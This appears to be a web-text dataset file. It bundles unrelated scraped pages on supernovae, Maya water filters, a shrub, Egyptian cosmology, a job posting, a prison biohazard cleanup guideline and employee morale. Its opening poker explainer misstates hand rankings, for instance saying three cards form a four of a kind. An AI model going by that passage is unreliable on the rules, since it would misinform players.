content
stringlengths 0
1.88M
| url
stringlengths 0
5.28k
|
---|---|
Poker is a popular gambling game where players place bets to try and get the best hand. All hands are formed by combining five cards. They can be a combination of different suits, such as Aces and King, or a mix of suits, such as Aces and deuces.
The best poker hand is a hand that includes the highest card, followed by two or three cards that are of the same rank. This is called a Straight Flush. Two players can tie for the highest straight, if they both have the same cards. If a player is tied for the highest hand, he or she breaks the tie with a high card.
Three cards can be used in order to form a Four of a Kind, which is a hand of four cards of the same rank. The player who has the highest four of a kind wins.
Another way to break a tie is with a pair of jacks. If you are the only player who has a pair of jacks, you are not obliged to open. However, if you are in a draw, you can show or declare your jacks-or-better.
Players can also discard one or more cards after the initial round of betting. Some games allow you to use Wild Cards, which are cards that can take the suit of any other card.
Poker is played with a deck of 52 cards. Each player is dealt a set of cards, clockwise around the table. These may be face down or face up. | https://webguideanyplace.com/index.php/2023/01/03/how-to-play-poker-5/ |
Supernova pairs have been used to accurately measure cosmological distances.
Within the last 20 years, astronomers have discovered that the Universe is expanding at an ever increasing rate due to dark energy. One technique used to detect this increase is to measure the distances to bright supernovae.
Only a Type 1a supernova is used for this type of measurement; characterised by a collision of white dwarf stars, or a single white dwarf feeding off a companion star. In either case, the result is a gargantuan explosion, the brightness of which can outshine the host galaxy. The resulting supernova is dazzlingly luminous for about a week, gradually fading over a period of about three months.
These sudden bursts of stellar radiation have been used for a long time to measure distances to far off galaxies. Known as ‘standard candles’, these thermonuclear explosions have proved to be far from standard though, varying in brightness by up to 40%. But a new paper published in November 2015 reveals a new method for reducing the uncertainty of their luminosity.
The problem with using a Type 1a as a standard measure is that the detection of its light can be hampered by intervening molecular clouds – interstellar gas and dust that can dim the apparent brightness of the supernova, causing a scattering of brightness.
Now, Dr Hanna Fakhouri and colleagues at the ‘Nearby Supernova Factory’ (SNfactory) based at the U.S. Department of Energy have reduced the brightness dispersion of Type 1a supernovae to as little as 8%. Their research sampled almost 50 nearby supernovae, identifying cosmic ‘twins’ – pairs with closely matching spectra. Using spectrophotometric time series observations, Fakhouri and her team have developed a method to improve cosmological measurements. The results have helped to standardise the brightness index of these explosive events. | https://creative-space.org.uk/2015/12/14/cosmic-twins/ |
Ancient Maya built sophisticated water filters
IMAGE: A temple rises above the rainforest at the ancient Maya city of Tikal.
view more
Credit: David Lentz
Ancient Maya in the once-bustling city of Tikal built sophisticated water filters using natural materials they imported from miles away, according to the University of Cincinnati.
UC researchers discovered evidence of a filter system at the Corriental reservoir, an important source of drinking water for the ancient Maya in what is now northern Guatemala.
A multidisciplinary team of UC anthropologists, geographers and biologists identified crystalline quartz and zeolite imported miles from the city. The quartz found in the coarse sand along with zeolite, a crystalline compound consisting of silicon and aluminum, create a natural molecular sieve. Both minerals are used in modern water filtration.
The filters would have removed harmful microbes, nitrogen-rich compounds, heavy metals such as mercury and other toxins from the water, said Kenneth Barnett Tankersley, associate professor of anthropology and lead author of the study.
"What's interesting is this system would still be effective today and the Maya discovered it more than 2,000 years ago," Tankersley said.
UC's discovery was published in the journal Scientific Reports.
The Maya created this water filtration system nearly 2,000 years before similar systems were used in Europe, making it one of the oldest water treatment systems of its kind in the world, Tankersley said.
Researchers from UC's College of Arts and Sciences traced the zeolite and quartz to steep ridges around the Bajo de Azúcar about 18 miles northeast of Tikal. They used X-ray diffraction analysis to identify zeolite and crystalline quartz in the reservoir sediments.
At Tikal, zeolite was found exclusively in the Corriental reservoir.
For the ancient Maya, finding ways to collect and store clean water was of critical importance. Tikal and other Maya cities were built atop porous limestone that made ready access to drinking water difficult to obtain for much of the year during seasonal droughts.
UC geography professor and co-author Nicholas Dunning, who has studied ancient civilizations most of his career, found a likely source of the quartz and zeolite about 10 years ago while conducting fieldwork in Guatemala.
"It was an exposed, weathered volcanic tuff of quartz grains and zeolite. It was bleeding water at a good rate," he said. "Workers refilled their water bottles with it. It was locally famous for how clean and sweet the water was."
Dunning took samples of the material. UC researchers later determined the quartz and zeolite closely matched the minerals found at Tikal.
UC assistant research professor Christopher Carr, an expert in geographic information system mapping, also conducted work on the UC projects at Bajo de Azúcar and Corriental.
"It was probably through very clever empirical observation that the ancient Maya saw this particular material was associated with clean water and made some effort to carry it back," Dunning said.
UC anthropology professor emeritus Vernon Scarborough, another co-author, said most research on ancient water management has tried to explain how civilizations conserved, collected or diverted water.
"The quality of water put to potable ends has remained difficult to address," Scarborough said. "This study by our UC team has opened the research agenda by way of identifying the quality of a water source and how that might have been established and maintained."
Of course, reconstructing the lives, habits and motivations of a civilization 1,000 years ago is tricky.
"This is what you have to do as an archaeologist," UC biologist and co-author David Lentz said. "You have to put together a puzzle with some of the pieces missing."
Lentz said the filtration system would have protected the ancient Maya from harmful cyanobacteria and other toxins that might otherwise have made people who drank from the reservoir sick.
"The ancient Maya figured out that this material produced pools of clear water," he said.
Complex water filtration systems have been observed in other ancient civilizations from Greece to Egypt to South Asia, but this is the first observed in the ancient New World, Tankersley said.
"The ancient Maya lived in a tropical environment and had to be innovators. This is a remarkable innovation," Tankersley said. "A lot of people look at Native Americans in the Western Hemisphere as not having the same engineering or technological muscle of places like Greece, Rome, India or China. But when it comes to water management, the Maya were millennia ahead."
###
Disclaimer: AAAS and EurekAlert! are not responsible for the accuracy of news releases posted to EurekAlert! by contributing institutions or for the use of any information through the EurekAlert system. | |
My introduction to Devil’s Walking Stick was quick, rude and painful.
I had just started climbing a very steep hill in the woods when the ground gave way under my right foot. In a flash, I reached for the closest “sapling.” Even after a couple of decades, I remember the simultaneous feeling of surprise and pain as I clamped my right hand tightly around a handful of long, sharp prickles.
Flat on my back at the bottom of the hill, my palm and fingers punctured and bleeding, I looked up and – silhouetted against the sky – could just make out the needle-like spikes ringing the Devil’s Walking Stick that I had grabbed on the hillside.
Like the first time you touch a hot stove, it was a lesson not soon forgotten.
Devil’s Walking Stick is a shrub native to the Southeastern U.S., concentrated from the Mississippi River to Virginia, though it is found as far west as Texas and as far north as New York. It tends to grow in colonies, so if you see one, you’ll likely see many more nearby.
This plant is a deciduous shrub, meaning it looses its leaves each winter, and in this case the word “shrub” may be a little misleading since it can grow up to 26 feet tall, well into “tree” height. Most of the time it is smaller, something between head-height and 10 feet tall.
Devil’s Walking Stick has two unique characteristics – the wickedly sharp prickles circling its stout trunk and its huge compound leaves, the largest of any shrub or tree in North America.
This is a showy, exotic, tropical-looking plant that appears to be a bit out of place in our hardwood and pine forests. In fact, it looks like something that you would expect to find on a lush, South Pacific island. Because it is so distinctive, it is sometimes grown in gardens. In fact, during Victorian period, English gardeners raised it as as a grotesque specimen, something to show off because it was so different.
Botanists call this plant Aralia spinosa. It is a member of the ginseng family, Araliaceae. In addition to Devil’s Walking Stick – an appropriate moniker if there ever was one – its other common names include Angelica Tree, Hercules’ Club, Prickly Ash and Prickly Elder.
Each spring, Devil’s Walking Stick sends up a tall stem that is spiked with thorns and looks a lot like, well, a walking stick. At the top of the stem, it will develop a few huge, double or triple pinnately compound green leaves. Each leaf looks like a lot of individual leaves but is actually one leaf with many leaflets. Several of these enormous leaves coming from the top of the stem form an umbrella-like canopy. Each compound leaf can be 3 to 4 feet long and 3 to 4 feet wide. During the fall, these leaves can change colors at different times so that one may be green, while another is yellow or red, making it a favorite of leaf-peekers.
As the plant matures in the summer, it produces large, tall clusters of beautiful white flowers 1 to 4 feet above the canopy of leaves. Its flowers are highly attractive to bees and butterflies, which harvest the nectar. In the fall, each flower becomes a green fruit that turns black when it ripens and stands out against a maze of pink stems up above the leaf canopy. A number of animals – including foxes, raccoons, opossums and other small mammals and songbirds – eat the fruit.
Devil’s Walking Stick is found most often in moist but well-drained open shade locations, often as an understory plant in thin forests or on the edges of fields, pastures or hillsides. It can tolerate sandy or clay loam soils and is often an early colonizer in open areas in the forest. Devil’s Walking Stick colonies sometimes die out as a forest grows up around it.
Despite its vicious prickles, Devil’s Walking Stick has been used by Native Americans for centuries.
Iroquois were known to plant them near their villages, so they could quickly access Devil’s Walking Stick fruit, which they used as a food, and the flowers, which were worn in women’s hair.
This plant was used to treat rheumatism and boils by a number of tribes, including the Cherokee, Choctaw and Rappahannock.
Devil’s Walking Stick roots are said to be poisonous, and handling the bark and roots could cause allergic reactions in some people.
Because this plant reproduces well by sending up suckers from its roots, larger, older Devil’s Walking Stick often is surrounded by a grove of smaller plants. For this reason, many gardeners say Devil’s Walking Stick is too aggressive for a home garden, but if you’re looking for something showy and different, it is easy to grow and doesn’t have many pests or diseases.
Just be careful what you grab when Devil’s Walking Stick is nearby.
Some information for this article came from The Ladybird Johnson Wildflower Center’s wildflower.org, the University of Arkansas’ Yard & Garden page, finegardening.com, the North Carolina Extension Gardner, and Wikipedia. | https://www.lakemagazine.life/nature_of_the_lake/devils-walking-stick/article_40cf50ce-b1af-11eb-8809-4f9f70463e32.html |
The world as we understand it is based on cause and effect, logical thinking and scientific thought. This is the world that we have inherited from the Greeks and Romans, a world that makes perfect sense to all of us. This is a logical discourse that affects our perception of space and time.
This has not always been the case though. Before the Greeks and the Romans appeared and constructed their wonderful civilisations, there were other cultures who believed in a different discourse from the one we have, a mythic discourse. This discourse was found all over the world: the Ancient Egyptians in North Africa, the Sumerians in Mesopotamia or the Aztecs and the Incas in America believed in myth, not in logic.
These cultures, even though they had no connection with each other, shared a similar view about the cosmos. This cosmology in which they believed affected the way they thought, the way they structured their world, their religion, the concept they had of time and space.
To provide a picture of what I am talking about, I am going to look at a single case, the Ancient Egyptians. This was a civilisation that existed for more than three millennia in an area located in North East Africa, around the Nile River.
First of all, describing the geographical conditions of the area, to say that this civilisation flourished around the river Nile. This is a river which is very good for navigation, with calm waters. There are seven waterfalls, which are all found at the beginning of the river. The Egyptians inhabited an area that ran from the river mouth until the first waterfall.
The Nile provided a good amount of water flow all year round. It is a river with peculiar characteristics. It rises at certain times of the year, always on the same months. When it grows floods the surroundings and converts the land next to it into fertile ground, converting the area on an ideal place for agriculture.
The Nile is surrounded by desert. As we all know, the desert means tough living conditions and lack of water. Hence why Egyptians lived near the river. These conditions offered protection to Egyptians. The citizens did not had to worry much about other human groups as there were no civilisations around them. The desert was a protection for them, like a natural wall blocking other intruders from penetrating their land. There was not much rain, but the river waters provided enough water for them to live.
All these characteristics made the life cycle in Egypt stable. There was certainty that the river flood in certain times of the year and that this flooding converted its land into fertile plains, giving the opportunity for Egyptians to live from agriculture. The river was also home to animal life, which could be hunted and fished.
Certainly these circumstances created in Egyptians a sense of belonging, of attachment to that wonderful land. They became part of the area they inhabited. The city where they lived, the area where they had their crops was essential for their existence. This area where they settled was therefore ordered. It was their little world, their cosmos.This contrasted with the desert, the outside, which was seen as chaos, a place in which life was not possible.
Bearing in mind these conditions where they lived and worked the land, we are able to better understand their mind set. But there is much more to comprehend than what weather or geographical conditions tell us. As I said, they experienced the area where they lived as being ordered. This was the world they knew. How could those living conditions have being constructed? How could such perfection have been achieved? This could have only been achieved by an entity of such power, of such perfection. This had to be a divine creation.
And, when and how this creation could have happened? This universe could only have been created by Gods. They were entities of magical powers. They were the only ones able to achieve such perfection. The time when it was achieved was a primeval time, a time of creation. Before the primeval time, everything was chaos, an immense sea of no life. Then, from a divine act out of this sea of chaos flourished a land of life. A land of order that started at a specific time, brought to life by Gods. This world created was an image of the universe. It was a cosmos reflecting the Universe on earth.
This world, this cosmos, was generated by the Gods. Gods were responsible for its creation and also for its maintenance. This world was based on a life cycle which was repeating itself, regenerating continuously. Years passed and the crops flourished, grown, matured and died. There was always the same life cycle which started and finished, regenerating, repeating itself, again and again. Order was in conflict with chaos, and gods were responsible for maintaining the balance and the order on earth. Hence why man had to work for the happiness of the Gods. Food offerings or sacrifices were continuously given to the Gods.
The Egyptian case was atypical though. They believed their Pharaoh was a God, a God brought up on earth to maintain the order and stability within the Universe. By having a God amongst them Egyptians had confidence for their survival. They were confident of knowing they had a God alongside them. A figure as divine and powerful as those Gods that created life on earth. The same confidence they had of knowing that the Nile would flood every year and would convert the surroundings into fertile lands for agriculture.
All the festivities they were celebrating, all the rituals they were performing, had a direct relation with this cosmology that they believed on, with this eternal return of the life cycle, this return to the primeval time, the time when order was created. The celebrations were aiming at the regeneration of the time. Therefore, time was seen as a repetition of a life cycle, a continuous return to a primeval time.
But not only time was regenerated. Space was also sacred and needed to be regenerated. It was a space of divine construction, a land order created at a primeval time by the Gods. Offerings and sacrifices were given to them in exchange for the land received. Mankind had the opportunity to benefit from the fruits that flourished on this fertile land. Reciprocity was required. Sacrifices were intended for the regeneration of the land.
As I mentioned already, Egyptians created a world that reflected the Universe. They believed that their living space had to reflect the cosmos. All the buildings they made were intended to reflect that Universe: the sun, the moon, the stars…
The land needed to be regenerated, year after year. Just as a seed flourishes when planted in the ground and then dies, growing back again next year. Sacrifices to the land brought regeneration of the land. Sacrifices were necessary to generate life. Death was necessary for life regeneration.
The life cycle repeated continuously. After Nile floods Egyptians were able to plant their crops. Then seeds flourished and after some time crops became ready to be harvested. Next step was death and the ground becoming infertile. This lasted until the next river flooding. A repetition of this eternal cycle happened again and again. Sacrifices had to be made to have this regeneration every year. Offering sacrifices to the Gods were necessary, as without them life was not going to be regenerated. It was necessary for the survival of the land, for the survival of the human species.
The eternal return of the life cycle and the particular view of the space and time was part of Egyptian culture. However, this civilisation is just an example of how a culture which lived from agriculture, organised their world to make sense to the conditions in which they lived. This case was atypical and had its own peculiarities, but had lots in common with other cultures and in all of them had to do with agriculture, with a sense of belonging to the land.
The beginnings of agriculture started around 10,000 years BC and have continued until our days. A lot of different civilisations existed since then and in various geographical areas. China, India, Mesopotamia, North Africa or South America give evidence of agricultural societies flourished.
I can´t stop thinking that the change from nomadism to agriculture resulted in a huge change of mankind mind thinking. That the reason why this myth discourse is found in most societies for millennia and all around the world is due to the move to agriculture.
The concept of time and space changed from that moment onwards. By having groups of humans settling down in an area, who started having a sense of belonging to a specific geographical area made them believe on the perfection of the landscape where they lived. They started interpreting the natural life cycle. Their crops flourishing, growing, maturing. This sense of belonging, this permanent stay in one area changed human world view forever.
Looking at the concept of time and space, one can only imagine how agricultural civilisations tried to understand the right time for harvesting and cultivation. They look at the sky, the movement of the planets, the sun, the moon, and interpreted it as a life cycle. A cycle that returned year after year. The Eternal Return.
Image taken from http://www.myartprints.co.uk .
Based on the book “The Myth of the Eternal Return” by Mircea Eliade. | https://panacas.com/2016/06/18/blog-post-title-6/ |
Summary:
In this riveting new novel, bestselling author John Darnton transports us to Victorian England and around the world to reveal the secrets of a legendary nineteenth-century figure. Darnton elegantly blends the power of fact and the insights of fiction to explore the many mysteries attached to the life and work of Charles Darwin. What led Darwin to the theory of evolution? Why did he wait twenty-two years to write On the Origin of Species? Why was he incapacitated by mysterious illnesses and frightened of travel? Who was his secret rival? These are some of the questions driving Darnton's richly dramatic narrative, which unfolds through three vivid points of view: Darwin's own as he sails around the world aboard the Beagle; his daughter Lizzie's as she strives to understand the guilt and fear that struck her father at the height of his fame; and that of present-day anthropologist Hugh Kellem and Darwin scholar Beth Dulcimer, whose obsession with Darwin (and with each other) drives them beyond the accepted boundaries of scholarly research. What Hugh and Beth discover - Lizzie's diaries and letters lead them to a hidden chapter of Darwin's autobiography - is a maze of bitter rivalries, petty deceptions, and jealously guarded secrets, at the heart of which lies the birth of the theory of evolution. | https://www.audiobooks.com/audiobook/darwin-conspiracy/142118 |
Please bring non-perishable items for the pantry that represent all the colors of the rainbow. EX: Beets, corn, mandarin oranges, green beans, blueberry muffins, grape jelly.
Of course, you can also bring other colors as well- like white or brown pasta or peanut butter. Place items in the red bin at the bottom of the steps.
Blessing Bags- We are in need of all items for the blessing bags. We would like to make at least 2 dozen bags each month. That means we need at least 24 of each item. Place items in the clear box labeled for the Blessing Bags at the bottom of the steps.
Thank you for your support of these on-going and vital outreach programs for the Overbrook/ Carrick community. | https://fairhaven-church.com/2022/03/25/spring-challenge-lets-eat-the-rainbow/ |
The Housing Authority is seeking exceptional, team-oriented candidates to work at the Senior Management Analyst or Management Analyst level. The level selected candidates will be placed at is dependent on their background, skills, and experience. Senior/Management Analysts work on a wide range of analytical, management, policy and technical assignments supporting AHA operations and programs, and will have the opportunity to perform meaningful and impactful work for an agency dedicated to providing affordable housing in the most impacted region of the nation.
Two positions are currently open. These positions in the Administration Department may be assigned a range of duties, particularly in the areas of: researching and drafting housing policy; providing support for housing programs, including designing and implementing quality control projects; coordinating agency-level procurement activities; serving as the back-up IT administrator; supporting the selection, implementation and ongoing maintenance of software; and leading projects and producing analytical reports related to topics such as reasonable accommodations, customer surveys and landlord incentives.
Incumbents will be responsible for a wide range of analytical and management tasks and projects serving various departments and programs. These positions require the ability to communicate and work effectively with a wide variety of internal and external stakeholders, lead project teams, and plan and carry out complex work assignments with minimal direction.
The Housing Authority reserves the right to use this advertisement and applicant response to fill other similar Management Analyst or Senior Management Analyst positions, including in other departments, for up to one year after the date of this notice.
MINIMUM QUALIFICATIONS
Any combination of training and experience that would provide the required knowledge, skills, and abilities is qualifying. A typical way to obtain the required qualifications would be:
- Equivalent to graduation from an accredited four-year college or university with major coursework in business administration, public administration, or a related field. A Master’s degree (or equivalent) is preferred. And
- For Management Analyst: Two (2) years of professional administrative and management support experience in public agency government.
- For Senior Management Analyst: Four (4) years of professional administrative and management support experience in public agency government. and some supervisory experience is strongly desirable.
- Candidates should possess strong technical skills including proficiency in common affordable housing and business software, such as Excel, Yardi and Laserfiche; and top notch analytical, research, report writing, problem solving, and project management skills. Strong presentation and statistical analysis skills are essential.
- Experience in one or more of the following areas including procurement, risk management, IT and/or subsidized housing preferred.
- Public sector budgeting/finance and employee training is desirable.
- Possession of, or ability to obtain, a valid driver’s license by time of appointment is required. Must be able to be insured under AHA’s owned automobile insurance policy.
- Proficiency in one of the Housing Authority’s LEP languages (Spanish, Vietnamese, Chinese or Tagalog) is preferred but not required.
- Some evening and after-hours work will be required to attend meetings and/or respond to emergencies.
IMPORTANT APPLICATION INFORMATION
Final Filing Date: Open Until Filled; Candidates should apply as soon as possible as the positions may close at any time
To apply, submit a:
- Housing Authority Employment Application
- Resume (three pages maximum, include months/years of employment), and
- Responses to the supplemental questions (two pages maximum)
Your resume and supplemental questions must be in Word or pdf format and uploaded into the employment application form. The AHA application form is located in the Working With AHA section of the Housing Authority’s website at http://www.alamedahsg.org. The full job description and supplemental questions are on the Open Positions page in Employment Opportunities.
ALL APPLICATIONS MUST BE SUBMITTED ELECTRONICALLY VIA EMAIL
If you need a reasonable accommodation under the American with Disabilities Act, please contact the Housing Authority office at [email protected]. | https://clpha.org/jobs/2022/senior-management-analystmanagement-analyst |
- The Institutional Head is responsible for:
- determining who will be involved in the cleaning up of blood and/or other body fluids:
- specifically trained staff
- specifically trained inmates (they must be under the supervision of specifically trained staff), and/or
- outside contractors
- maintaining a list of specifically trained staff and inmates
- providing the required training
- maintaining a supply of personal protective equipment and appropriate cleaning products.
Cleaning Blood and/or Other Body Fluid Spills
- Security staff will protect the scene prior to cleaning, thus clearing the affected area in order to preserve evidence. The affected area may need to be cordoned off to ensure no one is able to walk through.
- Appropriate personal protective equipment must be worn for cleaning up blood and/or other body fluid spills. This equipment should be changed if torn or soiled, followed by hand washing.
- Single-use impermeable gloves will be worn during the cleaning and disinfection procedures. If the possibility of splashing exists, the specifically trained staff or trained inmates or outside contractors will wear a face shield or goggles and a gown.
- The following clothing and material must be fluid resistant and readily available in identified locations:
- face shields
- masks
- non-latex gloves (e.g. nitrile or other barrier material)
- disposable gowns or waterproof aprons
- protective footwear
- eye protection (i.e. includes safety glasses, goggles or full-face shields)
- spill clean-up kit – commercial or one that contains gloves, pick-up scoop with scraper, intermediate level disinfectant, paper towels and garbage bags.
- The blood and/or other body fluid spill area will be cleaned of organic matter for the disinfection to be effective. Blood or other body fluids on surfaces (walls, floor, counter tops, inanimate objects, etc.) need to be wiped up using disposable towels or other absorbent material. Disposable towels used for wiping up blood or other body fluids need to be discarded in a plastic bag and can be placed with the regular garbage. Only items that are blood soaked (if squeezed they would drip blood) need to be discarded in a PLASTIC BIOHAZARD BAG.
- Surfaces contaminated with blood and/or other body fluids, and immediately adjacent to contaminated areas, will be disinfected with an intermediate level disinfectant (e.g., Accel TB), ensuring sufficient contact time.
- Surfaces that have not been directly contaminated with blood or other body fluids, and/or that are in close proximity to contaminated areas may be cleaned with detergents.
- Clothing contaminated with blood and/or other body fluids can be cleaned through regular laundering. Once removed, clothes will be placed in a plastic bag and care will be taken when placing these items in the washing machine not to cross-contaminate or handle without gloves. Place the plastic bag with the regular garbage.
- Once removed, single-use personal protective equipment will be placed in a plastic garbage bag stored with the regular garbage. Hands will be washed following glove removal. Care will be taken not to contaminate the outside of the garbage bag. Double bag if contamination is suspected.
- Once removed, non-disposable personal protective equipment will be disinfected with an intermediate level disinfectant, ensuring sufficient contact time.
Handling Security Equipment That Has Been in Contact With Biological Fluids
- The following procedures will be followed when handling security equipment that has been in contact with biological fluids:
- Place the equipment in transparent non-permeable (no holes) plastic bag of the appropriate size
- Handle the bag from the outside as the inside is considered to be contaminated
- Place a yellow or red biohazard label on the bag to indicate that it contains equipment contaminated with biological fluids
- Send the bag to the Security Maintenance Officer for decontamination of the equipment. For those institutions that do not have a Security Maintenance Officer, send the bag to the designated person
- When handling this equipment prior to decontamination, wear gloves and be careful not to cross-contaminate.
Proper Techniques
Hand Washing
- The purpose of hand washing is to remove soil, organic material and transient micro-organisms from the skin. A good hand washing technique reduces contamination by contact and helps to eliminate the transmission of pathogens to non-contaminated areas. Hand washing is considered one of the most important single interventions for preventing infections.
- To wash hands well:
- Remove all jewellery before hand washing (contaminated jewellery to be treated the same as hands)
- Rinse hands under warm running water to allow for suspension and washing away of the loosened micro-organisms
- Lather with soap and, using friction, cover all surfaces of the hands and fingers (the minimum duration of this step is 10 seconds, but more time may be required if hands are visibly soiled)
- Carefully clean frequently missed areas such as thumbs, under nails, backs of fingers and hands
- Rinse hands from fingertips to wrist under warm running water to wash off micro- organisms and residual hand washing agent
- Dry hands thoroughly with single-use towel or forced air dryer (reusable towels are avoided because of the potential for microbial contamination)
- Turn off faucet using a paper towel to prevent recontamination of hands.
- Faucet taps need to be decontaminated.
- The efficacy of hand washing depends on the time taken and the technique.
- To avoid potential cross-contamination, it is important not to splash clothing, other skin surfaces or inanimate items during hand washing.
Gloves
- Gloves will be worn at any time contact with blood, body fluids, mucous membranes or non intact skin can be reasonably anticipated. Note that gloves are not sterile.
- To put on the gloves:
- Remove gloves from the box by grasping them near the wrist and pull glove over the hand
- Change and discard gloves at the first sign of cracking, peeling and if torn or punctured.
- To take off the gloves:
- Pinch first glove below the wrist
- Pull the glove so that it turns inside-out as you remove it
- Slide an ungloved fingertip inside the cuff of the remaining glove
- Pull downward toward the fingertips off of the hand and over top of the first glove
- Drop the gloves into the garbage without touching the soiled outer surface of the used gloves with your bare hands
- Wash hands.
Gowns
- Long sleeved garments are preferred to minimize contamination of skin or clothes.
- To put on the gown:
- Unfold the gown and hold the gown so that the opening faces you
- One arm at a time, put on the gown
- Pull the gown over the shoulders
- Tie strings in the back so that the gown overlaps.
- To take off the gown:
- Untie the strings in the back of the gown
- Grasp the gown at the back of the shoulders and remove the gown pulling it forward down the arms and rolling it inside out into a bundle
- Place the gown in the garbage
- Wash hands.
Masks
- To put on the mask:
- Position the mask over the nose and mouth
- Bend the nose bar if applicable, over the bridge of the nose
- Depending on the type of mask, either fasten the ties or place the elastic bands over the back of the head and behind the neck.
- To take off the mask:
- Untie the bottom and then the top mask strings or release the elastic bands
- Remove the mask from face without touching the outside surface with bare hands
- Drop the mask into the garbage
- Wash hands.
ENQUIRIES
- Strategic Policy Division
National Headquarters
Email: [email protected]
Assistant Commissioner,
Health Services
Original Signed by:
Michele Brenning
Assistant Commissioner,
Human Resource Management
Original Signed by:
Elizabeth Van Allen
ANNEX A
CROSS-REFERENCES AND DEFINITIONS
CROSS-REFERENCES
GL 254-1 – Occupational Safety and Health Program
CD 568-4 – Preservation of Crime Scenes and Evidence
CD 800 – Health Services
GL 800-6 – Bleach Distribution
GL 800-8 – Post-Exposure Prophylaxis Protocol for Managing Significant Exposure to Blood and/or Other Body Fluids
Cleaning Best Practices for Health Centres and Regional Hospitals
Infection Prevention and Control Guidelines
DEFINITION
Blood-borne pathogens : viruses found in blood such as hepatitis B and C virus, or human immunodeficiency virus (HIV) which produce infection.
Contamination : a disinfected or sterile item or surface that becomes soiled with micro-organisms.
Cross-contamination : the transfer of an infectious agent from a contaminated source to a non-contaminated source.
Disinfection : a process that kills or destroys most disease producing micro-organisms.
Personal protective equipment : equipment designed to provide a barrier between a person and a known or potential hazardous material in order to minimize, reduce, or eliminate the risk of exposure to the hazardous material.
Single-use : devices that are designed to be used once and discarded as these items cannot be adequately cleaned and disinfected or sterilized.
For more information
- Government-wide Forward Regulatory Plans
- The Cabinet Directive on Regulatory
- The Federal regulatory management
- The Canada–United States Regulatory Cooperation Council
To learn about upcoming or ongoing consultations on proposed federal regulations, visit the Canada Gazette and Consulting with Canadians websites.
- Date modified : | https://www.csc-scc.gc.ca/policy-and-legislation/800-7-gl-eng.shtml |
Employee morale directly impacts employee engagement, which ties straight into their level of productivity. According to one Gallup report, disengaged employees cost US businesses up to $550 billion a year from lost productivity.
By understanding how employee morale and productivity are linked — and knowing how to accurately measure morale — you can better impact the overall attitude and engagement of your team and boost their productivity.
How employee morale and productivity are intertwined
Morale refers to someone’s emotional and mental state. It can also refer to an individual’s or a groups’ sense of purpose and level of confidence regarding future outcomes.
When we talk about morale at work, we’re referring to how your team members feel about the business, the work they do, and their place in the company.
Many research studies have been conducted across various locations, industries, and demographics to discover if there is a link between employee morale and productivity. Several studies indicate that morale can be directly tied to productivity.
Results also show that employee engagement directly impacts productivity, and morale is a significant factor in an employee’s level of engagement. Many of the factors that affect engagement, such as empowering employees, building bonds with other employees and leaders, and providing rewards and recognition, also impact morale.
This link between morale and engagement means that boosting employee morale can directly and indirectly increase productivity.
How to measure employee morale
Understanding the link between employee morale and productivity is only the first step toward improving employee and team performance. The next step is determining how to measure employee morale so that you can understand the current state of your team and track changes in morale over time.
One of the best ways to measure morale is through employee surveys. For the best results, make the surveys anonymous, have them completed routinely, and ask very specific questions that employees can answer by choosing a ranking from 1–5 or 1–10.
Some examples of survey questions are:
- Are you happy and fulfilled in your current position?
- Do you believe your hard work and effort is recognized?
- Do you feel there is room to grow in your job?
- How likely are you to stay with the company?
Another option for measuring employee morale is to conduct one-on-one interviews on a regular basis. You can also assess morale by tracking symptoms, such as:
- Changes in productivity
- Changes in tardiness or absenteeism rates
- Changes in employee turnover rates
What causes low employee morale?
If you discover employee morale is low or seems to be decreasing, it’s important you find out why. After all, if a specific problem is killing morale, any solutions that don’t address that problem are unlikely to help.
Some common causes of low employee morale are:
- Poor leadership. While it’s difficult to accept that you might be the problem, often, issues start at the top. Nearly 1/3 of employees think their current boss is a lousy manager, and roughly half have left a job because of a bad boss.
- Unclear expectations. If employees aren’t sure that they’re doing what is expected of them, it will hurt morale. Sadly, only half of employees report that they know what’s expected of them at work.
- Lack of rewards. Employees want to be rewarded for their work. When there are no rewards or incentives, they can feel their effort isn’t being recognized, which will kill their morale.
- Criticisms and punishments. If employees are punished for mistakes, or even if they fear retribution for potential errors, it can ruin their confidence. Keep in mind that taking away a previous benefit, like canceling casual Fridays, can also feel like a punishment.
- Negative coworkers. Unfortunately, one negative team member can quickly drag down the rest. If someone is frequently worrying or complaining, their low morale can rub off on the other employees.
- Fear of the unknown. As we discussed early, morale encompasses an employee’s outlook of the future. If they have reason to worry that their future isn’t secure, it will erode their morale. For instance, office gossip about the company losing money or potential layoffs will often damage morale.
How to improve employee morale
Removing any direct causes of low morale should help improve employee satisfaction and happiness at work. Here are some additional actions you can take to increase employee morale and productivity:
- Touch base regularly. Showing you care about your employee’s mental state can help improve morale. Regular one-on-ones can not only help you assess morale, but they can also help your employees feel like you’re interested in their well-being and development.
- Be transparent. Reports show that 70% of employees say they’re most engaged when senior leadership continually updates and communicates company strategy. Using objectives and key results (OKRs) can help your team see the larger picture and how their work fits into it.
- Celebrate. Celebrating big and small accomplishments helps your team feel recognized and appreciated for their hard work. Celebrating non-work events like birthdays can also help promote team bonding and make employees happier.
- Emphasize work-life balance. Less time spent at work can make employees feel happier and more relaxed. It can also boost their productivity.
Include your team in decisions. If employees don’t feel that they’re being considered in the decision-making process, it will make them feel undervalued and powerless.
- Reward employees. Teams and individuals should be rewarded for their hard work and commitment. Whether the reward is public recognition of work well done or a gift card to their favorite restaurant, regularly rewarding employees helps increase morale.
- Encourage feedback. Asking for honest feedback, responding positively, and addressing issues will increase your team’s happiness and their faith that you’re in their corner and want to help them succeed.
- Promote team bonding. Planning team events outside of work hours can help build a sense of belonging and unity that can, in turn, boost morale. Even remote teams can use tools like Zoom to participate in virtual team building activities.
Did you know that the tools you choose to use can play a significant role in your team’s morale?
The right work management and collaboration tools can help you measure and promote employee morale in a variety of ways.
For instance, chat features can increase communication and team bonding, while task lists can improve individuals’ understanding of what’s expected of them. Plus, project-wide dashboards can increase transparency and people’s understanding of how their work fits into the bigger picture.
Sign up for a free trial of Wrike today and discover how it can help boost your team’s morale and productivity! | https://www.wrike.com/blog/employee-morale-and-productivity/ |
